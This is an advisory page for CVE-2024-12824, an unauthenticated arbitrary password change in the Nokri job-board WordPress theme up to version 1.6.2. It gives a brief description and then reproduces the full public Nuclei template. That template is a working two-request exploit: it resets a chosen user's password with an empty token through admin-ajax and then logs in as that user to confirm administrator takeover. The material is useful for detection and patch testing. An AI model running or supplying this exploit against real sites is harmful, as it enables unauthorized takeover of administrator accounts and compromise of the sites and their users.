CVE-2024-12824: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change

Date: 2025-08-01 | Affected software: Nokri - Job Board WordPress Theme | PoC: public

Vulnerability description

The Nokri – Job Board theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. The theme's password-reset handler does not check for an empty token value before updating a user's details, including the password. This makes it possible for unauthenticated attackers to change the password of an arbitrary user, including administrators, and use that to gain access to the account. The public PoC does exactly this: one unauthenticated admin-ajax request with an empty token and a target user ID, followed by a login with the new password to confirm the takeover.

PoC code [public]

id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. The theme's password-reset handler does not check for an empty token value before updating a user's details, including the password. This makes it possible for unauthenticated attackers to change the password of an arbitrary user, including administrators, and use that to gain access to the account.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.52505
    epss-percentile: 0.97859
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-{{userid}}%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 490a00463044022007c1512fb4d05a8bb02a13d40d87f7b8319efa5348ed8b8425194cf15687951202203686bc814415ae957cd59677169489f6790e3a4c1a5168326bd60979602b5732:922c64590222798bb761d5b6d8e72950